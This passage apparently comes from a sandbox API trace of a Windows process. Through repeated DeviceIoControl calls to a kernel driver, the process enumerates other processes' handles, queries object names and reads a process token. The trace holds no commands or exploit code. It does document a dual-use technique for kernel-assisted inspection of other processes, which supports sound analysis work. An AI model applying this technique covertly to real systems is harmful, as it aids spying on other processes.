PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.863] PsAcquireProcessExitSynchronization () returned 0x0 [0137.863] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.863] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037659e0, HandleInformation=0x0) returned 0x0 [0137.863] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.864] PsReleaseProcessExitSynchronization () returned 0x2 [0137.864] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.864] ObQueryNameString (in: Object=0xfffffa80037659e0, ObjectNameInfo=0xfffffa8002f29044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f29044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.864] ObfDereferenceObject (Object=0xfffffa80037659e0) returned 0x1 [0137.864] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.864] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.864] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.864] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0137.864] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.864] PsAcquireProcessExitSynchronization () returned 0x0 [0137.864] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.864] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0137.864] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.865] PsReleaseProcessExitSynchronization () returned 0x2 [0137.865] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.865] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f2a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2a044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.865] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0137.865] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.865] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.865] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.865] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0137.865] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.865] PsAcquireProcessExitSynchronization () returned 0x0 [0137.865] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.865] ObReferenceObjectByHandle (in: Handle=0x23c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0137.865] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.865] PsReleaseProcessExitSynchronization () returned 0x2 [0137.866] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.866] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f2b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2b044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.866] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0137.866] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.866] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xc8 [0137.866] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0137.866] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003762b30, HandleInformation=0x0) returned 0x0 [0137.866] ObOpenObjectByPointer (in: Object=0xfffffa8003762b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800005bc) returned 0x0 [0137.866] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbf [0137.866] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa80020c0700 | out: TokenHandle=0xfffffa80020c0700*=0xc4) returned 0x0 [0137.866] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0137.866] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.867] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0137.867] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0137.880] CloseHandle (hObject=0xc4) returned 1 [0137.880] CloseHandle (hObject=0xc8) returned 1 [0137.880] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.880] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0137.880] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.880] PsAcquireProcessExitSynchronization () returned 0x0 [0137.881] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.881] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800375adc0, HandleInformation=0x0) returned 0x0 [0137.881] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.881] PsReleaseProcessExitSynchronization () returned 0x2 [0137.881] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.881] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f2c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f2c044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.881] ObfDereferenceObject (Object=0xfffffa800375adc0) returned 0x1 [0137.881] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.881] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.881] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0137.882] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.882] PsAcquireProcessExitSynchronization () returned 0x0 [0137.882] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.882] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800376fb90, HandleInformation=0x0) returned 0x0 [0137.882] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.882] PsReleaseProcessExitSynchronization () returned 0x2 [0137.882] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.882] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f32044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f32044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.882] ObfDereferenceObject (Object=0xfffffa800376fb90) returned 0x1 [0137.882] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.883] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.883] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.883] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xda, lpOverlapped=0x0) returned 1 [0137.883] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.883] PsAcquireProcessExitSynchronization () returned 0x0 [0137.883] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.883] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800256a710, HandleInformation=0x0) returned 0x0 [0137.883] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.883] PsReleaseProcessExitSynchronization () returned 0x2 [0137.883] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.883] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f56044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f56044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.884] ObfDereferenceObject (Object=0xfffffa800256a710) returned 0x12 [0137.884] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.884] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.884] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.884] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0137.884] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.884] PsAcquireProcessExitSynchronization () returned 0x0 [0137.884] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.884] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800378d950, HandleInformation=0x0) returned 0x0 [0137.884] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.884] PsReleaseProcessExitSynchronization () returned 0x2 [0137.885] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.885] ObQueryNameString (in: Object=0xfffffa800378d950, ObjectNameInfo=0xfffffa8002f67044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f67044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.885] ObfDereferenceObject (Object=0xfffffa800378d950) returned 0x2 [0137.885] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.885] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.885] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.885] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0137.885] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.885] PsAcquireProcessExitSynchronization () returned 0x0 [0137.885] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.885] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800378dbf0, HandleInformation=0x0) returned 0x0 [0137.885] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.885] PsReleaseProcessExitSynchronization () returned 0x2 [0137.885] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.886] ObQueryNameString (in: Object=0xfffffa800378dbf0, ObjectNameInfo=0xfffffa8002f68044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f68044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.886] ObfDereferenceObject (Object=0xfffffa800378dbf0) returned 0x1 [0137.886] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.886] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.886] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.886] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0137.886] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.886] PsAcquireProcessExitSynchronization () returned 0x0 [0137.886] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.886] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800378ef20, HandleInformation=0x0) returned 0x0 [0137.886] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.886] PsReleaseProcessExitSynchronization () returned 0x2 [0137.887] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.887] ObQueryNameString (in: Object=0xfffffa800378ef20, ObjectNameInfo=0xfffffa8002f69044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f69044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.887] ObfDereferenceObject (Object=0xfffffa800378ef20) returned 0x1 [0137.887] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.887] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.887] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.887] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0137.887] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.887] PsAcquireProcessExitSynchronization () returned 0x0 [0137.887] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.887] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003794c00, HandleInformation=0x0) returned 0x0 [0137.887] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.887] PsReleaseProcessExitSynchronization () returned 0x2 [0137.888] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.888] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f6a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f6a044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.888] ObfDereferenceObject (Object=0xfffffa8003794c00) returned 0x1 [0137.888] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.888] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.888] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.888] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0137.888] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.888] PsAcquireProcessExitSynchronization () returned 0x0 [0137.888] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.888] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800379fdd0, HandleInformation=0x0) returned 0x0 [0137.888] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.889] PsReleaseProcessExitSynchronization () returned 0x2 [0137.889] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.889] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f6b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f6b044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.889] ObfDereferenceObject (Object=0xfffffa800379fdd0) returned 0x1 [0137.889] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.889] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.889] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.889] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0137.889] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.889] PsAcquireProcessExitSynchronization () returned 0x0 [0137.889] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.889] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003270970, HandleInformation=0x0) returned 0x0 [0137.889] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.890] PsReleaseProcessExitSynchronization () returned 0x2 [0137.890] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.890] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f6c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f6c044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.890] ObfDereferenceObject (Object=0xfffffa8003270970) returned 0x12 [0137.890] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.890] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.890] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.890] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.890] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.890] PsAcquireProcessExitSynchronization () returned 0x0 [0137.890] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.891] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036c5a20, HandleInformation=0x0) returned 0x0 [0137.891] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.891] PsReleaseProcessExitSynchronization () returned 0x2 [0137.891] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.891] ObQueryNameString (in: Object=0xfffffa80036c5a20, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0137.891] ObfDereferenceObject (Object=0xfffffa80036c5a20) returned 0x2 [0137.891] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.891] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.891] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.891] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0137.892] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.892] PsAcquireProcessExitSynchronization () returned 0x0 [0137.892] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.892] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800379ff20, HandleInformation=0x0) returned 0x0 [0137.892] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.892] PsReleaseProcessExitSynchronization () returned 0x2 [0137.892] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.892] ObQueryNameString (in: Object=0xfffffa800379ff20, ObjectNameInfo=0xfffffa8002f0e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0e044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.892] ObfDereferenceObject (Object=0xfffffa800379ff20) returned 0x2 [0137.893] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.893] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.893] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.893] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.893] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.893] PsAcquireProcessExitSynchronization () returned 0x0 [0137.893] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.893] ObReferenceObjectByHandle (in: Handle=0x19c, 